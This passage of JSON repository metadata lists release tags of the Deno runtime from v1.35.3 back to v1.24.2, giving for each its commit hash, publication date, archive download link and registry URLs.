@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%